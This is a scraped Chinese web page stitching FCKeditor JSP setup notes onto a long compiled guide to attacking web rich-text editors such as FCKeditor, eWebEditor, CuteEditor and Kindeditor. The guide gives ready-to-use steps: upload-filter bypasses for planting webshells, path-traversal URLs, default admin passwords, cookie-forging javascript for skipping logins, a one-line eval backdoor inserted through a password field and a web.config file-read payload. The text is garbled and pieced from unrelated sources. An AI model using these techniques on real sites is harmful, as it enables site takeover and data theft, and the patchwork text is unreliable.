fckeditor 上传文件.cfc是什么文件

&servlet-name&Connector&/servlet-name&
&servlet-class&com.fredck.FCKeditor.connector.ConnectorServlet&/servlet-class&
&init-param&
¶m-name&baseDir&/param-name&
¶m-value&/UserFiles/&/param-value&
&/init-param&
&init-param&
¶m-name&debug&/param-name&
¶m-value&false&/param-value&
&/init-param&
&load-on-startup&1&/load-on-startup&
&/servlet&
&servlet-name&SimpleUploader&/servlet-name&
&servlet-class&com.fredck.FCKeditor.uploader.SimpleUploaderServlet&/servlet-class&
&init-param&
¶m-name&baseDir&/param-name&
¶m-value&/UserFiles/&/param-value&
&/init-param&
&init-param&
¶m-name&debug&/param-name&
¶m-value&true&/param-value&
&/init-param&
&init-param&
¶m-name&enabled&/param-name&
¶m-value&true&/param-value&
&/init-param&
&init-param&
¶m-name&AllowedExtensionsFile&/param-name&
¶m-value&&/param-value&
&/init-param&
&init-param&
¶m-name&DeniedExtensionsFile&/param-name&
¶m-value&php|php3|php5|phtml|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|dll|reg|cgi&/param-value&
&/init-param&
&init-param&
¶m-name&AllowedExtensionsImage&/param-name&
¶m-value&jpg|gif|jpeg|png|bmp&/param-value&
&/init-param&
&init-param&
¶m-name&DeniedExtensionsImage&/param-name&
¶m-value&&/param-value&
&/init-param&
&init-param&
¶m-name&AllowedExtensionsFlash&/param-name&
¶m-value&swf|fla&/param-value&
&/init-param&
&init-param&
¶m-name&DeniedExtensionsFlash&/param-name&
¶m-value&&/param-value&
&/init-param&
&load-on-startup&1&/load-on-startup&
&/servlet&
&servlet-mapping&
&servlet-name&Connector&/servlet-name&
&url-pattern&/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector&/url-pattern&
&/servlet-mapping&
&servlet-mapping&
&servlet-name&SimpleUploader&/servlet-name&
&url-pattern&/FCKeditor/editor/filemanager/upload/simpleuploader&/url-pattern&
&/servlet-mapping&
fckconfig.jsJScript code
FCKConfig.LinkBrowser = true ;
FCKConfig.LinkBrowserURL = FCKConfig.BasePath + &filemanager/browser/default/browser.html?Connector=connectors/jsp/connector& ;
FCKConfig.LinkBrowserWindowWidth
= FCKConfig.ScreenWidth * 0.7 ;
FCKConfig.LinkBrowserWindowHeight
= FCKConfig.ScreenHeight * 0.7 ;
FCKConfig.ImageBrowser = true ;
FCKConfig.ImageBrowserURL = FCKConfig.BasePath + &filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector& ;
FCKConfig.ImageBrowserWindowWidth
= FCKConfig.ScreenWidth * 0.7 ;
FCKConfig.ImageBrowserWindowHeight = FCKConfig.ScreenHeight * 0.7 ;
FCKConfig.FlashBrowser = true ;
FCKConfig.FlashBrowserURL = FCKConfig.BasePath + &filemanager/browser/default/browser.html?Type=Flash&Connector=connectors/jsp/connector& ;
FCKConfig.FlashBrowserWindowWidth
= FCKConfig.ScreenWidth * 0.7 ;
FCKConfig.FlashBrowserWindowHeight = FCKConfig.ScreenHeight * 0.7 ;
FCKConfig.LinkUpload = true ;
FCKConfig.LinkUploadURL = FCKConfig.BasePath + 'filemanager/upload/simpleuploader?Type=File' ;
FCKConfig.LinkUploadAllowedExtensions
= &.(7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip)$& ;
// empty for all
FCKConfig.LinkUploadDeniedExtensions
// empty for no one
FCKConfig.ImageUpload = true ;
FCKConfig.FlashUploadURL = FCKConfig.BasePath + 'filemanager/upload/simpleuploader?Type=Flash' ;
FCKConfig.ImageUploadAllowedExtensions
= &.(jpg|gif|jpeg|png|bmp)$& ;
// empty for all
FCKConfig.ImageUploadDeniedExtensions
// empty for no one
FCKConfig.FlashUpload = true ;
FCKConfig.ImageUploadURL = FCKConfig.BasePath + 'filemanager/upload/simpleuploader?Type=Image' ;
FCKConfig.FlashUploadAllowedExtensions
= &.(swf|flv)$& ;
// empty for all
FCKConfig.FlashUploadDeniedExtensions
// empty for no one
FCKConfig.SmileyPath
= FCKConfig.BasePath + 'images/smiley/msn/' ;
FCKConfig.SmileyImages
= ['regular_smile.gif','sad_smile.gif','wink_smile.gif','teeth_smile.gif','confused_smile.gif','tounge_smile.gif','embaressed_smile.gif','omg_smile.gif','whatchutalkingabout_smile.gif','angry_smile.gif','angel_smile.gif','shades_smile.gif','devil_smile.gif','cry_smile.gif','lightbulb.gif','thumbs_down.gif','thumbs_up.gif','heart.gif','broken_heart.gif','kiss.gif','envelope.gif'] ;
FCKConfig.SmileyColumns = 8 ;
FCKConfig.SmileyWindowWidth
FCKConfig.SmileyWindowHeight
报错The server didn't reply with a proper XML data. Please check your configuration.
昵称: cjing310 &时间:
昵称: cjing310 &时间:
昵称: cjing310 &时间:
昵称: cjing310 &时间:FCKeditor 在jsp [ssh 框架中]中如何调用 实现 图片上传/文件浏览【自己看文档摸索出来的】跟大家一块分享_读书人
FCKeditor 在jsp [ssh 框架中]中如何调用 实现 图片上传/文件浏览【自己看文档摸索出来的】跟大家一块分享
&来源:读书人网&【读书人网():综合教育门户网站】
FCKeditor 在jsp [ssh 框架中]中怎么调用 实现 图片上传/文件浏览【自己看文档摸索出来的】跟大家一块分享1:
FCKeditor 在jsp [ssh 框架中]中怎么调用 实现 图片上传/文件浏览【自己看文档摸索出来的】跟大家一块分享 && 1:下载 解压FCKeditor_2.6.4.1.zip 文本编辑器主体文件 放在webroot 目录下& FCK大写&& 2:解压FCKeditor-2.3.zip,(jsp,FCKeditor整合包)&&&&&&&& 1):将 src 下的 com 包全部copy到你的工程src 目录下 &&&&&&&& 2): 把FCKeditor.tld copy放在你的WEB-INF 目录下&&&&&&&& 3):copy lib 下面的两个开发包:FCKeditor-2.3.jar commons-fileupload.jar 放在你的lib 目录下&&& && 3:配置web.xml&& 这个是我配置的 &&&& &?xml version="1.0" encoding="UTF-8"?&&!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "/dtd/web-app_2_3.dtd"&&&&& &!--web-app_2_3.dtd& 版本不能高--&&web-app&&display-name&FCKeditor Test Application&/display-name&&servlet&&servlet-name&Connector&/servlet-name&&servlet-class&com.fredck.FCKeditor.connector.ConnectorServlet&/servlet-class&&init-param&¶m-name&baseDir&/param-name&¶m-value&/UserFiles/&/param-value&&/init-param&&init-param&¶m-name&debug&/param-name&¶m-value&true&/param-value&&/init-param&&load-on-startup&1&/load-on-startup&&/servlet&&servlet&&servlet-name&SimpleUploader&/servlet-name&&servlet-class&com.fredck.FCKeditor.uploader.SimpleUploaderServlet&/servlet-class&&init-param&¶m-name&baseDir&/param-name&¶m-value&/UserFiles/&/param-value&&/init-param&&init-param&¶m-name&debug&/param-name&¶m-value&true&/param-value&&/init-param&&init-param&¶m-name&enabled&/param-name&¶m-value&true&/param-value&&/init-param&&init-param&¶m-name&AllowedExtensionsFile&/param-name&¶m-value&&/param-value&&/init-param&&init-param&¶m-name&DeniedExtensionsFile&/param-name&¶m-value&php|php3|php5|phtml|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|dll|reg|cgi&/param-value&&/init-param&&init-param&¶m-name&AllowedExtensionsImage&/param-name&¶m-value&jpg|gif|jpeg|png|bmp&/param-value&&/init-param&&init-param&¶m-name&DeniedExtensionsImage&/param-name&¶m-value&&/param-value&&/init-param&&init-param&¶m-name&AllowedExtensionsFlash&/param-name&¶m-value&swf|fla&/param-value&&/init-param&&init-param&¶m-name&DeniedExtensionsFlash&/param-name&¶m-value&&/param-value&&/init-param&&load-on-startup&1&/load-on-startup&&/servlet&&servlet-mapping&&servlet-name&Connector&/servlet-name&&url-pattern&/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector&/url-pattern&&/servlet-mapping&&servlet-mapping&&servlet-name&SimpleUploader&/servlet-name&&url-pattern&/FCKeditor/editor/filemanager/upload/simpleuploader&/url-pattern&&/servlet-mapping&&taglib&&taglib-uri&/FCKeditor&/taglib-uri&&taglib-location&/WEB-INF/FCKeditor.tld&/taglib-location&&/taglib&&/web-app&&& 这样就可以了。 下面有我的测试源程序& 下载可以运行&fckeditor上传路径
您的位置: →
fckeditor上传路径
第一篇:fckeditor上传路径jsp 修改 fckeditor 上传图片路径 绝对路径的修改
我们这里讨论的是绝对路径的修改。如果你需要该相对路径只需要改 ¶m-value&UserFiles/&/param-value& 里的值就可以了 fckeditor 对 jsp 支持一般般,要配置一大堆,网上都是类似的文章,就不复述了,如何修 改上传文件的路径,却一直没有解决方法,找了半天,最后只有自己哼哧哼哧的改 由于 fckeditor 默认的上传路径是自己工程环境下,/UserFiles,是在 web.xml 里配置的
view plaincopy to clipboardprint?
1. &init-param& 2. 3. ¶m-name&baseDir&/param-name& ¶m-value&UserFiles/&/param-value& *这里少了一个 /
4. &/init-param&
这里没法改成绝对路径,所以只有到 servlet 里想办法,找到类 fff init 方法里的参数获取不要管,主要是在 doGet()里面 String currentPath=baseDir+typeStr+currentFolderS String currentDirPath = getServletContext().getRealPath(currentPath); 这个是原来的写法 取的就是当前项目 webcontent 下的/UserFiles/ 这里改成 String currentPath=baseDir+typeStr+currentFolderS currentPath=currentPath.replace('\\','/'); String currentDirPath=&你需要存放文件的绝对路径&+currentP 如 String currentDirPath=&d:/dweb_box/&+currentP *这里多了一个 / 下面还要改 原来的写法如下 Node root=CreateCommonXml(document,commandStr,typeStr,currentFolderStr,req uest.getContextPath()+currentPath); 这里改成 Node root=CreateCommonXml(document,commandStr,typeStr,currentFolderStr,&你 需要存放文件的 tomcat 应用的相对路径&+currentPath);
如 Node root=CreateCommonXml(document,commandStr,typeStr,currentFolderStr,&/d web_box/&+currentPath); * 和 tomc 应用的 path=&/dweb_box& 对应 doPost()方法里 currentPath 和 currentDirPath 改法与 doGet 一致 servlet 里只需要改这么多就可以了 注意哈 如果你上传文件后还是看不到 很可能是你的存放文件的路径没有配置成 tomcat 应用 如上面的例子 &Context displayName=&dweb_box& docBase=&d:/dweb_box& path=&/dweb_box&& &/Context& 如有疑问和遗漏请留言给我
第一篇:fckeditor上传路径之前用的 freetextbox 可视化编辑器,一直解决不了上传图片到指定路径的问题,但是项目偏偏需要这个 功能的, 无奈之下只有百般搜索,呵呵终于功夫不负有心人。CKEditor+CKFinder 就解决了我的燃眉之急。使用方法如下 CKEditor1.解压 CKEditor 到 webRoot 目录,在应用页面加载其 ckeditor. 2.页面 textarea:
&textarea cols='80' name='editor1' rows='10'&&/textarea&
CKFinder3.解压 CKFinder 到 webRoot 目录(最好与 CKEditor 同级) ; 4.页面 script:(最好 textarea 之后)
代码 //&![CDATA[ CKEDITOR.replace('&%=mckeditor.ClientID %&', { language'zh-cn', skin'kama', uiColor'#9EBEF5', width'600', enterModeNumber(2), shiftEnterModeNumber(1), filebrowserBrowseUrl'&%=ResolveUrl(&~/ckfinder/ckfinder.html&)%& ', filebrowserImageBrowseUrl'&%=ResolveUrl(&~/ckfinder/ckfinder.ht ml?Type=Images&)%&', filebrowserUploadUrl'&%=ResolveUrl(&~/ckfinder/core/connector/a spx/connector.aspx?command=QuickUpload&type=Files&)%&' }); //]]&
5、 修改 config.ascx 文件中的 BaseDir=&d:\images\& 如果为空是相对路径, ( 否则为绝对路径)BaseUrl , = &/uploads/&(文件上传目录) 和 CheckAuthentication()上传身份验证; 6.在 ckeditor\config.js 中的 CKEDITOR.editorConfig 里加入以下需要自定义的配置代码:
代码 CKEDITOR.editorConfig = function(config) { //配置默认配置 config.language = 'zh-cn'; //配置语言 config.uiColor = '#FFF'; //背景颜色 config.width = 400; //宽度
config.height = 400; //高度 config.skin = 'v2'; //编辑器皮肤样式 // 取消 “拖拽以改变尺寸”功能 config.resize_enabled = // 使用基础工具栏 config.toolbar = &Basic&; // 使用全能工具栏 config.toolbar = &Full&; //使用自定义工具栏 config.toolbar = [ ['Source', 'Preview', '-'], ['Cut', 'Copy', 'Paste', 'PasteText', 'PasteFromWord', ], ['Undo', 'Redo', '-', 'Find', 'Replace', '-', 'SelectAll', 'RemoveFo rmat'], ['Image', 'Flash', 'Table', 'HorizontalRule', 'Smiley', SpecialChar', 'PageBreak'], '/', ['Bold', 'Italic', 'Underline', '-', 'Subscript', 'Superscript'], ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', 'Blockquo te'], ['JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock'], ['Link', 'Unlink', 'Anchor'], '/', ['Format', 'Font', 'FontSize'], ['TextColor', 'BGColor'], ['Maximize', 'ShowBlocks', '-', 'About'] ]; };
第一篇:fckeditor上传路径FCKeditor FCKeditor 编辑器页/查看编辑器版本/查看文件上传路径 FCKeditor 编辑器页 FCKeditor/_samples/default.html 查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFolders AndFiles&Type=Image&CurrentFolder=/ XML 页面中第二行 “url=/xxx”的部分就是默认基准上传路径 Note:[Hell1]截至 2010 年 02 月 15 日最新版本为 FCKeditor v2.6.6 [Hell2]记得修改其中两处 asp 为 FCKeditor 实际使用的脚本语言
FCKeditor 被动限制策略所导致的过滤不严问题 影响版本FCKeditor x.x &= FCKeditor v2.4.3 脆弱描述FCKeditor v2.4.3 中 File 类 别 默 认 拒 绝 上 html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc| pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 &= 2.2 允许上传 asa、cer、php2、php4、inc、pwml、pht 后缀的文件 上 传 后 它 保 存 的 文 件 直 接 用 的 $sFilePath = $sServerDir . $sFileName , 而 没 有 使 用 $sExtension 为后缀 直接导致在 win 下在上传文件后面加个.来突破[未测试] 而在 apache 下,因为&Apache 文件名解析缺陷漏洞&也可以利用之,详见&附录 A& 另建议其他上传漏洞中定义 TYPE 变量时使用 File 类别来上传文件,根据 FCKeditor 的代码, 其限制最为狭隘。攻击利用允许其他任何后缀上传 Note:[Hell1]原作:/logs/6091.html 利用 2003 路径解析漏洞上传网马 影响版本附录 B 脆弱描述利用 2003 系统路径解析漏洞的原理,创建类似“bin.asp”如此一般的目录,再在此目录中上 传文件即可被脚本解释器以相应脚本权限执行。攻击利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/a sp/connector.asp
FCKeditor PHP 上传任意文件漏洞 影响版本FCKeditor 2.2 &= FCKeditor 2.4.2 脆弱描述FCKeditor 在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。在通过 editor/filemanager/upload/php/upload.php 上传文件时攻击者可以通过为 Type 参数定义 无效的值导致上传任意脚本。成功攻击要求 config.php 配置文件中启用文件上传,而默认是禁用的。攻击利用(请修改 action 字段为指定网址)FCKeditor 《=2.4.2 for php.html Note:如想尝试 v2.2 版漏洞,则修改 Type=任意值 即可,但注意,如果换回使用 Media 则必 须大写首字母 M,否则 LINUX 下,FCKeditor 会对文件目录进行文件名校验,不会上传成功 的。TYPE 自定义变量任意上传文件漏洞 影响版本较早版本 脆弱描述通过自定义 Type 变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格 式的限制。攻 击 利 用 /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/as p/connector.asp 打开这个地址就可以上传任何类型的文件了,Shell 上传到的默认位置是/UserFiles/all/1.asp &Type=all& 这个变量是自定义的,在这里创建了 all 这个目录,而且新的目录没有上传文件格 式的限制. 比如输入/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp /connector.asp 网马就可以传到网站的根目录下. Note如 找 不 到 默 认 上 传 文 件 夹 可 检 查 此 文 件 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFolders AndFiles&Type=Image&CurrentFolder=/ FCKeditor 新闻组件遍历目录漏洞 影响版本:aspx 版 FCKeditor,其余版本未测试 脆弱描述:如何获得 webshell 请参考上文“TYPE 自定义变量任意上传文件漏洞”
攻击利用修改 CurrentFolder 参数使用 ../../来进入不同的目录 /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&Curren tFolder=../../..%2F&NewFolderName=aspx.asp 根据返回的 XML 信息可以查看网站所有的目录。/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image& CurrentFolder=%2F FCKeditor 中 webshell 的其他上传方式 影响版本:非优化/精简版本的 FCKeditor 脆弱描述如果存在以下文件,打开后即可上传文件。攻击利用fckeditor/editor/filemanager/upload/test.html fckeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor 文件上传“.”变“_”下划线的绕过方法 影响版本FCKeditor =& 2.4.x 脆弱描述我们上传的文件例如shell.php.rar 或 shell..jpg 会变为 shell_.jpg 这是新版 FCK 的变 化。攻击利用提交 1.php+空格 就可以绕过去所有的, ※不过空格只支持 win 系统 *nix 是不支持的[1.php 和 1.php+空格是 2 个不同的文件] Note:upload/778.jpg 这样的格式做了过滤。也就是 IIS6 解析漏洞。上传第一次。被过滤为 123_123.jpg 从而无法运行。但是第 2 次上传同名文件 123.123.jpg 后。由于”123_123.jpg”已经存在。文件名被命名为 123.123(1).jpg …… 123.123(2).jpg 这样的编号方式。所以。IIS6 的漏洞继续执行了。
如果通过上面的步骤进行测试没有成功,可能有以下几方面的原因1.FCKeditor 没有开启文件上传功能,这项功能在*** FCKeditor 时默认是关闭的。如果想 上传文件,FCKeditor 会给出错误提示。2.网站采用了精简版的 FCKeditor,精简版的 FCKeditor 很多功能丢失,包括文件上传功能。3.FCKeditor 的这个漏洞已经被修复。-------------------------------------------------------------------------------eWebEditor eWebEditor 利用基础知识 默认后台地址:/ewebeditor/admin_login.asp 建议最好检测下 admin_style.asp 文件是否可以直接访问
默认数据库路径:[PATH]/db/ewebeditor.mdb [PATH]/db/db.mdb -- 某些 CMS 里是这个数据库 也可尝试 [PATH]/db/%23ewebeditor.mdb -- 某些管理员自作聪明的小伎俩 使用默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456 (有 些管理员以及一些 CMS,就是这么设置的) 点击“样式管理”--可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的 上传类型后面加上|asp、 |asa、 |aaspsp 或|cer, 只要是服务器允许执行的脚本类型即可, 点击“提 交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式,点击插入图片,上传 WEBSHELL,在“代码”模式中查看上传文件的路径。2、当数据库被管理员修改为 asp、asa 后缀的时候,可以插一句话木马服务端进入数据库, 然后一句话木马客户端连接拿下 webshell 3、上传后无法执行?目录没权限?帅锅你回去样式管理看你编辑过的那个样式,里面可以 自定义上传路径的!! ! 4、 设置好了上传类型, 依然上传不了麽?估计是文件代码被改了, 可以尝试设定“远程类型” 依照 6.0 版本拿 SHELL 的方法来做(详情见下文↓) ,能够设定自动保存远程文件的类型。5、不能添加工具栏,但设定好了某样式中的文件类型,怎么办?↓这么办! (请修改 action 字段) Action.html
eWebEditor 踩脚印式入侵 脆弱描述当我们下载数据库后查询不到密码 MD5 的明文时, 可以去看看 webeditor_style(14)这个样式 表,看看是否有前辈入侵过 或许已经赋予了某控件上传脚本的能力,构造地址来上传我们 自己的 WEBSHELL. 攻击利用比如 ID=46 s-name =standard1 构造 代码ewebeditor.asp?id=content&style=standard ID 和和样式名改过后 ewebeditor.asp?id=46&style=standard1 eWebEditor 遍历目录漏洞 脆弱描述ewebeditor/admin_uploadfile.asp admin/upload.asp 过滤不严,造成遍历目录漏洞 攻击利用第一种:ewebeditor/admin_uploadfile.asp?id=14 在 id=14 后面添加&dir=..
再加 &dir=../.. &dir=/../.. 看到整个网站文件了 第二种ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./.. eWebEditor 5.2 列目录漏洞 脆弱描述ewebeditor/asp/browse.asp 过滤不严,造成遍历目录漏洞 攻击利用/ewebeditor/asp/browse.asp?style=standard650&;dir=…././/.. 利用 WebEditor session 欺骗漏洞,进入后台 脆弱描述漏洞文件:Admin_Private.asp 只判断了 session,没有判断 cookies 和路径的验证问题。攻击利用新建一个 test.asp 内容如下&%Session(&eWebEditor_User&) = &&%& 访问 test.asp,再访问后台任何文件,for example:Admin_Default.asp eWebEditor asp 版 2.1.6 上传漏洞 攻击利用:(请修改 action 字段为指定网址) ewebeditor asp 版 2.1.6 上传漏洞利用程序.html
eWebEditor 2.7.0 注入漏洞 攻击利用/ewebeditor/ewebeditor.asp?id=article_content&;style=full_v200 默认表名:eWebEditor_System 默认列名:sys_UserName、sys_UserPass,然后利用 nbsi 进 行猜解. eWebEditor2.8.0 最终版删除任意文件漏洞 脆弱描述此漏洞存在于 Example\NewsSystem 目录下的 delete.asp 文件中, 这是 ewebeditor 的测试页面, 无须登陆可以直接进入。攻击利用(请修改 action 字段为指定网址) Del Files.html
eWebEditor v6.0.0 上传漏洞 攻击利用在编辑器中点击“插入图片”--网络--输入你的 WEBSHELL 在某空间上的地址 (注文件名称 必须为:xxx.jpg.asp 以此类推…) ,确定后,点击“远程文件自动上传”控件(第一次上传会 提示你***控件,稍等即可) ,查看“代码”模式找到文件上传路径,访问即可,eweb 官方的
DEMO 也可以这么做,不过对上传目录取消掉了执行权限,所以上传上去也无法执行网马. eWebEditor PHP/ASP…后台通杀漏洞 影响版本PHP ≥ 3.0~3.8 与 asp 2.8 版也通用,或许低版本也可以,有待测试。攻击利用进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了. 这时候你清空浏览器的 url,然后输入 javascript:alert(document.cookie=&adminuser=&+escape(&admin&)); javascript:alert(document.cookie=&adminpass=&+escape(&admin&)); javascript:alert(document.cookie=&admindj=&+escape(&1&)); 而 后 三 次 回 车 , 清 空 浏 览 器 的 URL, 现 在 输 入 一 些 平 常 访 问 不 到 的 文 件 如../ewebeditor/admin/default.php,就会直接进去。
eWebEditor for php 任意文件上传漏洞 影响版本:ewebeditor php v3.8 or older version 脆弱描述此版本将所有的风格配置信息保存为一个数组$aStyle,在 php.ini 配置 register_global 为 on 的 情况下我们可以任意添加自己喜欢的风格,并定义上传类型。攻击利用phpupload.html
eWebEditor JSP 版漏洞 大同小异,我在本文档不想多说了,因为没环境 测试,网上垃圾场那么大,不好排查。用 JSP 编辑器的我觉得 eweb 会比 FCKeditor 份额少得多。给出个连接:/post/161.html 还有:/zhuru/article/all//a.shtml eWebEditor 2.8 商业版插一句话木马 影响版本:=&2.8 商业版 攻击利用登陆后台,点击修改密码---新密码设置为 1&:eval request(&h&)’ 设置成功后,访问 asp/config.asp 文件即可,一句话木马被写入到这个文件里面了.
eWebEditorNet upload.aspx 上传漏洞(WebEditorNet) 脆弱描述WebEditorNet 主要是一个 upload.aspx 文件存在上传漏洞。攻击利用默认上传地址:/ewebeditornet/upload.aspx 可以直接上传一个 cer 的木马
如果不能上传则在浏览器地址栏中输入 javascript:lbtnUpload.click(); 成功以后查看源代码找到 uploadsave 查看上传保存地址, 默认传到 uploadfile 这个文件夹里。southidceditor(一般使用 v2.8.0 版 eWeb 核心) /admin/southidceditor/datas/southidceditor.mdb /admin/southidceditor/admin/admin_login.asp /admin/southidceditor/popup.asp bigcneditor(eWeb 2.7.5 VIP 核心) 其 实 所 谓 的 Bigcneditor 就 是 eWebEditor 2.7.5 的 VIP 用 户 版 . 之 所 以 无 法 访 问 admin_login.asp, 提示“权限不够”4 字真言, 估计就是因为其授权“Licensed”问题,或许只允许 被授权的机器访问后台才对。或许上面针对 eWebEditor v2.8 以下低版本的小动作可以用到这上面来.貌似没多少动作? -------------------------------------------------------------------------------Cute Editor Cute Editor 在线编辑器本地包含漏洞 影响版本CuteEditor For Net 6.4 脆弱描述可以随意查看网站文件内容,危害较大。攻击利用/CuteSoft_Client/CuteEditor/Load.ashx?type=image&;file=../../../web.co nfig -------------------------------------------------------------------------------Webhtmleditor 利用 WIN 2003 IIS 文件名称解析漏洞获得 SHELL 影响版本:&= Webhtmleditor 最终版 1.7 (已停止更新) 脆弱描述/攻击利用对上传的图片或其他文件无重命名操作,导致允许恶意用户上传 diy..jpg 来绕过对后缀 名审查的限制,对于此类因编辑器作者意识犯下的错误,就算遭遇缩略图,文件头检测,也 可使用图片木马 插入一句话来突破。-------------------------------------------------------------------------------Kindeditor 利用 WIN 2003 IIS 文件名称解析漏洞获得 SHELL 影响版本&= kindeditor 3.2.1(09 年 8 月份发布的最新版) 脆弱描述/攻击利用拿官方做个演示:进入 upload/513.jpg 大家可以前去围观。Note:参见附录 C 原理解析。-------------------------------------------------------------------------------Freetextbox
Freetextbox 遍历目录漏洞 影响版本:未知 脆弱描述因为 ftb.imagegallery.aspx 代码中 只过滤了/但是没有过滤\符号所以导致出现了遍历目录的 问题。攻击利用在编辑器页面点图片会弹出一个框(抓包得到此地址)构造如下,可遍历目录。/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&;rif=. .&cif=\.. -------------------------------------------------------------------------------附录 AApache 文件名解析缺陷漏洞测试环境:apache 2.0.53 winxp,apache 2.0.52 redhat linux 1.国外(SSR TEAM)发了多个 advisory 称 Apache&s MIME module (mod_mime)相关漏洞, 就 是 attack.php.rar 会 被 当 做 php 文 件 执 行 的 漏 洞 , 包 括 Discuz! 那 个 p11.php.php.php.php.php.php.php.php.php.php.php.php.rar 漏洞。2.S4T 的 superhei 在 blog 上发布了这个 apache 的小特性, apache 是从后面开始检查后缀, 即 按最后一个合法后缀执行。其实只要看一下 apache 的 htdocs 那些默认***的 index.XX 文件 就明白了。3.superhei 已经说的非常清楚了,可以充分利用在上传漏洞上,我按照普遍允许上传的文件 格式测试了一下,列举如下(乱分类勿怪) 典型型:rar 备份型:bak,lock 流媒体型:wma,wmv,asx,as,mp4,rmvb 微软型:sql,chm,hlp,shtml,asp 任意型:test,fake,ph4nt0m 特殊型:torrent 程序型:jsp,c,cpp,pl,cgi 4.整个漏洞的关键就是 apache 的&合法后缀&到底是哪些,不是&合法后缀&的都可以被利用。5.测试环境 a.php &? phpinfo();?& 然后增加任意后缀测试,a.php.aaa,a.php.aab.... By cloie, in ph4nt0m.net(c) Security.
附录 B***了 iis6 的服务器(windows2003),受影响的文件名后缀有.asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition 是微软目前主流的服务器操作系统。Windows 2003 IIS6 存 在着文件解析路径的漏洞,当文件夹名为类似 hack.asp 的时候(即文件夹名看起来像一个 ASP 文件的文件名) 此时此文件夹下的任何类型的文件(比如.gif, , .jpg, 等)都可以在 IIS .txt 中被当做 ASP 程序来执行。这样黑客即可上传扩展名为 jpg 或 gif 之类的看起来像是图片文 件的木马文件, 通过访问这个文件即可运行木马。如果这些网站中有任何一个文件夹的名字 是以 .asp .php .cer .asa .cgi .pl 等结尾,那么放在这些文件夹下面的任何类型的文件都有可 能被认为是脚本文件而交给脚本解析器而执行。附录 C漏洞描述当文件名为[YYY].[ZZZ].jpg 时,Microsoft IIS 会自动以 asp 格式来进行解析。而当文件名为[YYY].[ZZZ].jpg 时, Microsoft IIS 会自动以 php 格式来进行解析。其中[YYY]与[ZZZ]处为可变化字符串。影响平台Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0) 修补方法1、等待微软相关的补丁包 2、关闭图片所在目录的脚本执行权限(前提是你的某些图片没有与程序混合存放) 3、 校验网站程序中所有上传图片的代码段, 对形如[YYY].[ZZZ].jpg 的图片做拦 截 备注对于 Windows Server 2008(IIS7)以及 Windows Server 2008 R2(IIS7.5) 则未受影响
fckeditor上传路径相关文章
《》由(一起看范文网)整理提供,版权归原作者、原出处所有。
Copyright &
All Rights Reserved.

参考资料

 

随机推荐